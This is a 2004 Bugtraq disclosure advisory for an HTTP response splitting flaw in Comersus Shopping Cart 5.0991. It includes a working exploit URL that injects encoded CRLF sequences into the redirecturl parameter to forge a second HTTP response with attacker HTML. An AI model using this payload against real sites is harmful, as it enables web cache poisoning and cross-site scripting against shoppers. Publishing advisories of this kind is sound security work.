[36353] in bugtraq
ADVISORY: http response splitting hole in Comersus shopping cart
daemon@ATHENA.MIT.EDU (Maestro De-Seguridad)
Thu Sep 2 00:42:32 2004
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
From: "Maestro De-Seguridad" <maestrodeseguridad@lycos.com>
To: bugtraq@securityfocus.com
Date: Tue, 31 Aug 2004 23:52:54 -0500
Message-Id: <20040901045254.199A9E5BC6@ws7-2.us4.outblaze.com>
ADVISORY
Author: Maestro (me!)
Date: 01-SEP-04
Vendor: Comersus (www.comersus.com)
Product: Comersus Shopping Cart 5.0991
Problem: Http response splitting (web cache poisoning, xss,
yadayadayada) -
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
Exploit:
http://site/path_to_comersus/comersus_customerLoggedVerify.asp?
redirecturl=%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-L
ength:%2028%0d%0a%0d%0a{html}0wned%20by%20me{/html}
(replace curly braces with lessthan and greaterthan)
Vendor status: vendor was contacted (attempt) several times over the
last two weeks, by their bug report form, and by emal to support. No
response so far.
--
_______________________________________________
Find what you are looking for with the Lycos Yellow Pages
http://r.lycos.com/r/yp_emailfooter/http://yellowpages.lycos.com/default.asp?SRC=lycos10
